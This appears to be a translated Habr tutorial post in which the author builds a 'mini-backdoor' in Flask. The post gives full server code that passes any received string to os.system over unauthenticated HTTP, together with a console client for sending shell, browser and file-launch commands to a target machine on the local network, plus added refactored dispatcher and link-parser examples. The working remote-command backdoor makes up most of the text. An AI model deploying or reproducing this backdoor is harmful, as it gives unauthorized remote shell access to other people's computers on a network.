Hello, Habr!
I was watching a downloaded recording of the project stream "How to make your own web application in Flask" and decided to apply what I had learned to some project of my own. For a long time I could not think of anything to write, until the idea came to me: "Why not make a mini-backdoor in Flask?"
The first ideas for the implementation and the capabilities of the backdoor appeared in my head right away. But I decided to make a list of the capabilities first:
- be able to open websites
- get access to the command line
- be able to open programs, pictures and videos
So, the first item is very easy to implement with the webbrowser module. I decided to implement the second item with the os module. The third also goes through the os module, but I will use "links" for it (more on that below).
Writing the server
So, *drumroll*, the whole server code:
from flask import Flask, request
import webbrowser
import os

app = Flask(__name__)


@app.route('/mycomp', methods=['POST'])
def hell():
    # Every request is a JSON object of the form {'command': ..., 'data': ...}
    json_string = request.get_json(force=True)
    if json_string['command'] == 'test':
        return 'The server is running and waiting for commands...'
    if json_string['command'] == 'openweb':
        # Open the site in the default browser of the machine running the server
        webbrowser.open(url='https://www.' + json_string['data'], new=0)
        return 'Site opening ' + json_string['data'] + '...'
    if json_string['command'] == 'shell':
        # Pass the received string to the system shell unchanged
        os.system(json_string['data'])
        return 'Command execution ' + json_string['data'] + '...'
    if json_string['command'] == 'link':
        # links.txt holds one 'full_path>description' per line;
        # 'data' is the 1-based number of the line to launch
        with open('links.txt', 'r') as links:
            line = links.readlines()[int(json_string['data']) - 1].strip()
        path, description = line.split('>', 1)
        os.system(path)
        return 'Launch ' + description
    return 'Unknown command', 400


if __name__ == '__main__':
    app.run(host='0.0.0.0')
I have dumped all the code, now it is time to explain what it does.
The whole thing runs on the local machine on port 5000. To interact with the server we need to send a POST request with a JSON body.
Structure of the JSON request:
{'command': 'somecommand', 'data': 'somedata'}
Here 'command' is, accordingly, the command we want to execute, and 'data' holds the arguments of the command.
You can write and send the JSON requests to the server by hand (the requests module will help you with that), or you can write a console client.
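The server above looks the command up with a chain of if statements and indexes the JSON directly, so a body without a 'command' key or with an unknown command ends in a Python exception and an HTTP 500. The dispatcher below is an added example, not code from the original post: it handles the same three non-file commands through a handler table, answers malformed bodies with a 400 and a reason, and takes the two side effects (opening a browser, running a shell line) as injected callables so the whole client/server exchange can be replayed offline. The request bodies in simulate_session, the Recorder class and the real_dispatcher wiring are all constructed for this example.

```python
import json
import os
import webbrowser


class CommandDispatcher:
    """Validate one {'command': ..., 'data': ...} request and run the matching handler.

    open_url and run_shell are injected so the dispatcher can be exercised
    without touching the browser or the shell; real_dispatcher() wires the
    real ones in.
    """

    def __init__(self, open_url, run_shell):
        self._open_url = open_url
        self._run_shell = run_shell
        self._handlers = {
            'test': self._test,
            'openweb': self._openweb,
            'shell': self._shell,
        }

    def handle(self, raw_body):
        """Parse a request body (bytes) and return (http_status, reply_text)."""
        try:
            payload = json.loads(raw_body)
        except (ValueError, UnicodeDecodeError):
            return 400, 'Body is not valid JSON'
        command = payload.get('command') if isinstance(payload, dict) else None
        if not isinstance(command, str):
            return 400, "Missing or non-string 'command' field"
        handler = self._handlers.get(command)
        if handler is None:
            return 400, 'Unknown command: %r' % (command,)
        return handler(payload.get('data'))

    def _test(self, data):
        return 200, 'The server is running and waiting for commands...'

    def _openweb(self, data):
        if not isinstance(data, str) or not data:
            return 400, "openweb needs a site name in 'data'"
        self._open_url('https://www.' + data)
        return 200, 'Site opening ' + data + '...'

    def _shell(self, data):
        if not isinstance(data, str) or not data.strip():
            return 400, "shell needs a command line in 'data'"
        status = self._run_shell(data)
        return 200, 'Command execution %s... (exit status %s)' % (data, status)


def real_dispatcher():
    """Dispatcher wired to the real actions, as a Flask view would use it."""
    return CommandDispatcher(open_url=lambda url: webbrowser.open(url, new=0),
                             run_shell=os.system)


class Recorder:
    """Stand-in for a side effect: remembers every argument, returns a fixed value."""

    def __init__(self, result=None):
        self.calls = []
        self.result = result

    def __call__(self, arg):
        self.calls.append(arg)
        return self.result


def simulate_session():
    """Replay a short client/server exchange offline.

    Returns (replies, urls_opened, shell_lines_run). The bodies are constructed
    here to mirror what the console client sends.
    """
    opened = Recorder()
    ran = Recorder(result=0)
    dispatcher = CommandDispatcher(open_url=opened, run_shell=ran)
    bodies = [
        b'{"command": "test", "data": 0}',
        b'{"command": "openweb", "data": "example.com"}',
        b'{"command": "shell", "data": "whoami"}',
        b'{"command": "reboot"}',      # not in the handler table
        b'{"data": "whoami"}',         # no command field
        b'not json at all',
    ]
    replies = [dispatcher.handle(body) for body in bodies]
    return replies, opened.calls, ran.calls


if __name__ == '__main__':
    for reply in simulate_session()[0]:
        print(reply)
```

Inside a Flask view the call would be `status, text = real_dispatcher().handle(request.get_data())` followed by `return text, status`; the 'link' command is left out here because it depends on the links.txt format explained further down.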
Writing the client
Straight to the code:
import requests

logo = ['\n\n',
        '****** ********',
        '******* *********',
        '** ** ** **',
        '** ** ** ** Written on Python',
        '******* ** **',
        '******** ** **',
        '** ** ** ** Author: ROBOTD4',
        '** ** ** **',
        '** ** ** **',
        '******** *********',
        '******* ********',
        '\n\n']

iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'


def send(payload):
    """POST one JSON command to the server and print its reply."""
    r = requests.post(host, json=payload)
    if r.status_code == 200:
        print(r.content.decode('utf-8'))


def test():
    send({'command': 'test', 'data': 0})


def start():
    for i in logo:
        print(i)


start()
test()
while True:
    command = input('>')
    if command == '':
        continue
    a = command.split()
    if a[0] == 'test':
        test()
    elif a[0] == 'shell':
        # Everything after 'shell' goes to the server as one command line
        if len(a) > 1:
            send({'command': 'shell', 'data': ' '.join(a[1:])})
        else:
            print('The command has no arguments!')
    elif a[0] == 'link':
        if len(a) > 1:
            send({'command': 'link', 'data': int(a[1])})
        else:
            print('The command has no arguments!')
    elif a[0] == 'openweb':
        if len(a) > 1:
            send({'command': 'openweb', 'data': a[1]})
        else:
            print('The command has no arguments!')
    elif a[0] == 'set':
        # 'set host <ip>' points the client at another machine on the local network
        if len(a) > 2 and a[1] == 'host':
            iport = a[2] + ':5000'
            host = 'http://' + iport + '/mycomp'
        else:
            print('Usage: set host <ip>')
    elif a[0] == 'quit':
        break
Explanations:
First the requests module is imported (for talking to the server). Below it come the definitions of the start and test functions. Then the loop in which the magic happens. Have you read the code? Then you understand what kind of magic happens in the loop: you type a command and it gets executed.
shell - commands for the command line (not the interpreter)
test - check whether the server (the backdoor) is running
link - use a "shortcut"
openweb - open a website
quit - exit the client
set - set the IP of the target computer on the local network
And now about the links.
Next to the server there is a links.txt file. It contains links (full paths) to files (videos, pictures, programs).
Here is its structure:
full_path>description
full_path>description
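The server resolves a 'link' request by reading that many lines from links.txt and splitting the last one on '>', which breaks on blank lines, on a line without a separator, and on a number that is 0 or past the end of the file. The functions below are an added example, not part of the original post: a parser for the links.txt format described above, a 1-based lookup with a range check, and a launch_link helper that takes the launcher as a parameter (os.system by default, as the server uses it) so it can be tested without starting anything. The sample file contents in CONSTRUCTED_LINKS and the paths in it are made up for this example.

```python
import os


def parse_links(text):
    """Parse the links.txt format: one 'full_path>description' per line.

    Blank lines are skipped. A line without '>' is rejected instead of being
    passed through, because the path half of the line is what ends up in
    os.system().
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if '>' not in line:
            raise ValueError("line %d: expected 'full_path>description', got %r"
                             % (lineno, line))
        path, description = line.split('>', 1)   # description may itself contain '>'
        entries.append((path.strip(), description.strip()))
    return entries


def select_link(entries, number):
    """Return the entry for a 1-based link number, as the 'link' command counts them."""
    if (isinstance(number, bool) or not isinstance(number, int)
            or not 1 <= number <= len(entries)):
        raise IndexError('link number %r is out of range 1..%d' % (number, len(entries)))
    return entries[number - 1]


def launch_link(text, number, run=os.system):
    """Resolve link `number` from links.txt content and hand its path to `run`.

    Returns the reply string the server sends back. `run` defaults to
    os.system, which is how the server launches the file; pass another
    callable to exercise the lookup without launching anything.
    """
    path, description = select_link(parse_links(text), number)
    run(path)
    return 'Launch ' + description


# Constructed sample of a links.txt file (the paths are made up for the example)
CONSTRUCTED_LINKS = """C:\\Users\\demo\\Videos\\intro.mp4>Intro video
C:\\Users\\demo\\Pictures\\logo.png>Logo

notepad.exe>Text editor
"""


if __name__ == '__main__':
    for index, (path, description) in enumerate(parse_links(CONSTRUCTED_LINKS), 1):
        print(index, path, '->', description)
```

In the server, the 'link' branch becomes `return launch_link(open('links.txt').read(), int(json_string['data']))`, with the ValueError and IndexError turned into a 400 reply instead of a crash.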
Conclusion
We have a backdoor server for controlling a computer on a local network (inside a Wi-Fi network). Technically, the client can be run from anything that has a Python interpreter. Note that the server listens on all interfaces, has no authentication and speaks plain HTTP, so anyone who can reach port 5000 on that machine can send it the same commands, including 'shell'.
PS I added the set command so that if a computer on the local network is given a different IP, it can be changed directly in the client.
Source: www.habr.com